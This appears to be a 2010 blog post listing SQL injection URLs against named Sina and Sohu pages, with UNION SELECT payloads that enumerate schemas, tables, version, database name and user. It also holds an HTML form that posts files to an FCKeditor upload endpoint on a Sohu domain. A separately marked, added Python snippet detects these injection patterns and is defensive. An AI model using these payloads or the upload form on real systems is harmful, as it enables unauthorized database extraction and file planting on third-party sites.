Sina, Sohu high-risk injection vulnerabilities

sina

Injection page:
http://php.baby.sina.com.cn/diary/list.php

Enumerate databases:
http://php.baby.sina.com.cn/diary/list.php?netid=5167%20and%201=2%20union%20select%201,2,3,group_concat(schema_name),5,6,7,8,9%20from%20information_schema.schemata--
Enumerate tables:
http://php.baby.sina.com.cn/diary/list.php?netid=51675115%20and%201=2%20union%20select%201,2,group_concat(table_name),4,5,6,7,8,9%20from%20information_schema.tables%20where%20table_schema=0x70687062616279

sohu

http://card.money.sohu.com/yh/card_product.php?id=62 and 1=2 union   select 1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27

http://card.money.sohu.com/yh/card_product.php?id=62 and 1=2 union   select 1,database(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27

http://card.money.sohu.com/yh/card_product.php?id=62 and 1=2 union   select 1,user(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
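
A defender-side check for the pattern in the URLs above, added here as an example (not code from the original post): it treats `netid` and `id` as integer-only parameters and labels any non-numeric value with the UNION-extraction markers it contains. The function names, marker labels and request targets are hypothetical and constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Parameters the application expects to be plain integers; "netid" and "id"
# are the names used in the URLs above.
NUMERIC_PARAMS = {"netid", "id"}

# Markers of UNION-based extraction, matched against the URL-decoded value.
MARKERS = {
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "schema_enum": re.compile(r"\binformation_schema\b", re.I),
    "boolean_clause": re.compile(r"\band\s+\d+\s*=\s*\d+", re.I),
    "hex_literal": re.compile(r"\b0x[0-9a-f]{4,}\b", re.I),
    "info_function": re.compile(r"\b(?:version|database|user)\s*\(", re.I),
}

def inspect_request(target):
    """Return {param: [marker names]} for numeric params that are not all digits."""
    findings = {}
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        if name not in NUMERIC_PARAMS or re.fullmatch(r"[0-9]+", value):
            continue
        hits = [label for label, rx in MARKERS.items() if rx.search(value)]
        findings[name] = hits or ["non_numeric"]
    return findings

# Constructed request targets (not taken from any real log).
SAMPLE_TARGETS = [
    "/list.php?netid=5167",
    "/list.php?netid=5167%20and%201=2%20union%20select%201,2,"
    "group_concat(schema_name)%20from%20information_schema.schemata--",
    "/product.php?id=62+and+1=2+union+select+1,version(),3",
    "/list.php?netid=1&filter=0x64656d6f",
    "/list.php?netid=12abc",
]

def scan(targets):
    """Return only the targets that produced findings, with their findings."""
    return [(t, f) for t in targets if (f := inspect_request(t))]

if __name__ == "__main__":
    for target, found in scan(SAMPLE_TARGETS):
        print(found, target)
```

Flagging is only the detection half; the same integer-only rule, enforced in the application before the value reaches the query (or a bound parameter), is what closes the injection point.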

<form id="frmUpload" enctype="multipart/form-data" action="http://club.sohu.com/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post"> 
Upload a new file:<br> 
<input type="file" name="NewFile" size="50"><br> 
<input id="btnUpload" type="submit" value="Upload"> 
</form>

posted @ 2010-08-07 10:30  blueray